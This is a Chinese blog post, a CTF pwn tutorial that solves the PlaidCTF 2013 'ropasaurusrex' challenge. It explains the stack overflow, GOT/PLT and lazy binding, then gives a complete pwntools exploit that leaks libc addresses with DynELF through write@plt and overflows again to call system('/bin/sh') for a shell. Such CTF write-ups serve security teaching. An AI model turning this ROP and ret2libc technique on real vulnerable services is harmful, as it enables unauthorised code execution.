Linux下pwn从入门到放弃,[原创][分享]Pwn从入门到放弃(三)

最新推荐文章于 2021-09-08 09:06:52 发布
最新推荐文章于 2021-09-08 09:06:52 发布
阅读量165 收藏
点赞数
文章标签: Linux下pwn从入门到放弃

0x01 栈溢出利用

0x02 基本的ROP利用

0x03 题目三:

该题目是plaidctf-2013的一道题,ropasaurusrex

第一步:

checksec看一下该程序开了哪些保护:

9bfe9657152d1da31c5b9fabedb3de44.png

程序为32位小端,保护只开启了NX保护,意味着堆栈不可执行。

第二步:

运行该程序看看:

08bd99996da91b49330eced8211cae35.png

待你输入内容后,会给一些的反馈

*第三步:

gdb动态调试一下看看:

4c6a5756306aa0f583393c96648aecd0.png

可以看到,崩溃在140处,因此可以知道返回地址在144字节处。

第四步:

同样,将程序丢到IDA中看一下:

a7951e7fff983a2ef4b1f40840a5b066.png

发现程序逻辑相对还是比较简单的,在main中,发现sub_80483F4函数中存在可利用的溢出漏洞,另外发现该程序中并没有可利用的system和'/bin/sh',但却存在read和write函数。

64a51a6278f2d78f610b111789bc2587.png

第五步:

溢出思路:

由于程序没有提供libc.so文件,故需要将返回地址覆盖为write@plt,利用write@plt将read@got内容打印出来从而获得libc、system等函数的地址

计算system和'/bin/sh'地址

然后通过gadget指令重新跳转至sub_80483F4再次溢出,将返回地址覆盖

为system,将'/bin/sh'地址部署在相应的参数位置即可

知识点:

GOT(Global Offset Table,全局偏移表)是Linux ELF文件中用于定位全局变量和函数的一个表。

PLT(Procedure Linkage Table,过程链接表)是Linux ELF文件中用于延迟绑定的表,即函数第一次被调用的时候才进行绑定。

延迟绑定,就是当函数第一次被调用的时候才进行绑定(包括符号查找、重定位等),如果函数从来没有用到过就不进行绑定。基于延迟绑定可以大大加快程序的启动速度,特别有利于一些引用了大量函数的程序。

栈布局:

284369611c180ef1bd64f97bf6381c5f.png

第六步:

我们可以利用DynELF来轻松获得程序某函数的实际运行地址。

**知识点2:DynELF,是pwntools中有一个很方便的类,可以通过使用该类利用泄露函数,从而获取程序的system、read等函数地址。

第七步:

最终的EXP代码:

#-*- coding: utf-8 -*-

from pwn import *

p = process('./ropasaurusrex')

elf = ELF('./ropasaurusrex')

write_plt_addr = elf.symbols['write']

start_addr = 0x08048340

bin_sh_addr = 0x08049628 #空白的可写.bss地址

#利用write@plt获取read@got地址

def leak(addr):

payload = "A" * 140

payload += p32(write_plt_addr)

payload += p32(start_addr) #为了使程序不至于崩溃,因此将返回地址设置为程序的start地址

payload += p32(1) #write参数1,int fd(文件描述符)

payload += p32(addr) #write参数2,buf(指定的缓冲区,即指向read的指针)

payload += p32(4) #write参数3,要写入的字节数

p.sendline(payload)

content = p.recv(4)

# print("%#x => %s" % (addr, (content or '').encode('hex')))

return content

d = DynELF(leak, elf = elf )

system_addr = d.lookup('system','libc')

read_addr = d.lookup('read','libc')

print ("system_address: %#x" % system_addr)

print ("read_address: %#x" % read_addr)

base_addr = read_addr - elf.symbols['read']

print ("base_address: %#x" % base_addr)

payload = "A" *140

payload += p32(read_addr)

payload += p32(system_addr)

payload += p32(0)

payload += p32(bin_sh_addr)

payload += p32(8)

p.sendline(payload)

p.sendline('/bin/sh\x00')

p.interactive()

b687cfe9b305c42efa561e24284e8c6e.png

参考:

https://bbs.ichunqiu.com/thread-42933-1-1.html?from=aqzx1

https://www.jianshu.com/p/590bc1d6c292

http://www.baymrx.me/2019/08/19/PWN%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95%E2%80%94%E2%80%942013-PlaidCTF-ropasaurusrex/

https://www.jianshu.com/p/6626a866ad66

最后于 2020-1-2 17:21

被bugchong编辑

,原因: 栈布局图修正

上传的附件:

ropasaurusrex

(2.88kb,9次下载)

weixin_39977642
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux PWN入门到熟练
墨痕诉清风的博客
07-19 1763
最近在复习pwn的一些知识。主要涉及到当堆栈开启了保护的时候,我们不能够直接将shellcode覆盖到堆栈中执行,而需要利用程序其他部分的可执行的小片段来连接成最终的shellcode。此小片段就是gadgets。本文主要通过练习题的方式讲述如何寻找gadgets,如何利用现有的工具来加速自己的pwn的效率。Gadgets的类型和难度也逐步变化。下面带来手把手教你linux pwn。让你的pwn技术从入门到熟练。练习题的难度逐步加大。
Linuxpwn入门放弃,pwn入门放弃章——gdb的基本使用教程
weixin_29338423的博客
05-14 1732
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?考完试了,来填坑gdb在做题中经常用到,熟练掌握gdb会事半功倍我们继续用第二章中的程序来讲解gdb的使用将程序直接拖进vmware中,因为我们下的vmware专用版本的kali,所以已经安装好vmware tool之类的,直接拖进去或者复制粘贴进去就可以了打开terminal,cd到Desktop先给程序加可执行权限,...
pwn ctf 入门 0x05
爱党人士
07-14 526
CTF-PWN pwn 基于二进制的漏洞挖掘与利用 基于漏洞的利用脚本 基于流量的复现脚本 能力分析 汇编代码逆向分析能力 程序内存分布 栈结构 堆结构 函数调用的流程(逆向的角度) 内存保护机制 汇编到c 自己去学点逆向去, 不然后面是看不懂的。 掌握汇编 崩不崩溃? 哈哈 pwn特点: 入门难,进阶难,精通难。 再了解一波结构。 64位的与32位的不同, 而很多人学的都是16位...
Linuxpwn入门放弃
热门推荐
一个码农的笔记
12-15 1万+
0x0 简介 pwn,在安全领域中指的是通过二进制/系统调用等方式获得目标主机的shell。 虽然web系统在互联网中占有比较大的分量,但是随着移动端,ioT的逐渐流行,传统的缓冲区溢出又一次有了用武之处 0x01 工欲善其事,必先利其器 Linux下的pwn常用到的工具有: (1)gdb:Linux调试中必要用到的 (2)gdb-peda:gdb方便调试的工具,类似的工具有gef,gd
Linuxpwn入门放弃,Linuxpwn入门放弃
weixin_31817039的博客
05-14 339
Linuxpwn入门放弃0x0 简介pwn,在安全领域中指的是通过二进制/系统调用等方式获得目标主机的shell。虽然web系统在互联网中占有比较大的分量,但是随着移动端,ioT的逐渐流行,传统的缓冲区溢出又一次有了用武之处0x01 工欲善其事,必先利其器Linux下的pwn常用到的工具有:gdb:Linux调试中必要用到的pwntools:写exp和poc的利器checksec:可以很方便...
Linuxpwn入门放弃,pwn入门放弃第六章——简单ROP
weixin_39770506的博客
05-14 256
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?这篇鸽了挺久的,补一下吧简单介绍ROP首先先来说下什么是ROPROP是Return Oriented Programming 的缩写翻译过来就是面向返回的编程你可能会问,我们不是利用栈溢出漏洞么,怎么又扯到编程了?其实ROP就是另外一种意义上的编程,其核心在于利用了指令集中的 ret 指令,改变了指令流的执行顺序。RO...
02-linux pwn入门学习到放弃.pdf
09-20
Linux Pwn入门学习到放弃的文档内容主要涉及Linux系统下Pwn基础、保护机制、漏洞分析和常用工具集合等知识。Pwn在这里指的是黑客利用漏洞获取系统权限的技术,字面意思为“拥有”,在游戏对战中取得优势。 首先,...
Linux pwn入门教程.rar
09-21
Linux pwn入门教程\环境配置\栈溢出基础\格式化字符串漏洞等
Linux pwn入门教程(1)——栈溢出基础-0x01.rar
06-10
Linux pwn入门教程(1)——栈溢出基础
Exploit利器——Pwntools
qq_30445397的博客
12-10 142
Exploit利器——Pwntools
pwntools:类型转换
m0_53932372的博客
09-08 5046
byte和str 首先一定要注意,byte和str在python里面有明确的区分,尤其是在做pwn的题目时,一定要注意这个问题。 参考链接:https://www.cnblogs.com/mlgjb/p/7899534.html hex hex(x) x -- 10进制整数 返回16进制数,以字符串形式表示。 p32、p64 p32(x) x-- 一个整型数据 返回byte型。 u32、u64 u32(x) x-- byte型 返回整型。 int类型转换 int(a,base=x)
pwntools使用初探——简单栈溢出的利用
小小鱼的博客
06-03 1526
注意的坑: buf长度要足够长,至少要大于shellcode的长度 pwntools生成shellcode的时候要在shellcract语句前面加上context
[PWN][补充篇]pwntools的相关知识
网络安全知识分享
03-28 1813
@TOC 0x0 安装 sudo pip install pwntools 0x1 导入包 from pwn import* 0x2 链接远程服务器或者链接本地文件 远程 r = remote(‘目的IP或目标URL’,目标端口号) 本地 r = process('./文件名') 0x3 接收远端回传的数据 interactive() //在取得shell之后使用,直接进行交互,相当于回到shell的模式 recv(numb = 字节大小,timeout = default) //接收指定字节数
DynELF
钞sir的博客
01-29 6228
我用生的期许 换回世相思雨 千浮沉里的你 迷失轮回的自己
Linux pwn入门教程(1)——栈溢出基础
dfdhxb995397的博客
06-29 688
作者:Tangerine@SAINTSEC 原文来自:https://bbs.ichunqiu.com/thread-42241-1-1.html 0×00 函数的进入与返回 要想理解栈溢出,首先必须理解在汇编层面上的函数进入与返回。首先我们用一个简单执行一次回显输入的程序hello开始。用IDA加载hello,定位到main函数后我们发现这个程序的逻辑十分简单,调用函数hello...
Linux pwn入门教程(0)——环境配置
dfdhxb995397的博客
07-02 943
作者:Tangerine@SAINTSEC 0×00前言 作为一个毕业一年多的辣鸡CTF选手,一直苦于pwn题目的入门难,入了门更难的问题。本来网上关于pwn的资料就比较零散,而且经常会碰到师傅们堪比解题过程略的writeup和没有注释,存在大量硬编码偏移的脚本,还有练习题目难找,调试环境难搭建,GDB没有IDA好操作等等问题。作为一个老萌新(雾),决定依据Atum师傅在i春秋上的p...
python3-pwntools教程_pwntools的简单介绍
weixin_42502378的博客
01-14 1363
pwntools是一个CTF框架和漏洞利用开发库,用Python开发,旨在让使用者简单快速的编写exploit。这里简单的介绍一下pwntools的使用。首先就是导入包from pwn import *你将在全局空间里引用pwntools的所有函数。现在可以用一些简单函数进行汇编,反汇编,pack,unpack等等操作。将包导入后,我一般都会设置日志记录级别,方便出现问题的时候排查错误contex...
Linux pwn零基础入门教程:环境配置到实战攻击
通过这个系列,读者可以了解到如何从零开始构建Linux环境,理解基础漏洞利用技术,并掌握在实际竞赛或项目中应用这些知识的技巧。对于那些想踏入Linux安全领域的人来说,这是一份宝贵的教育资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值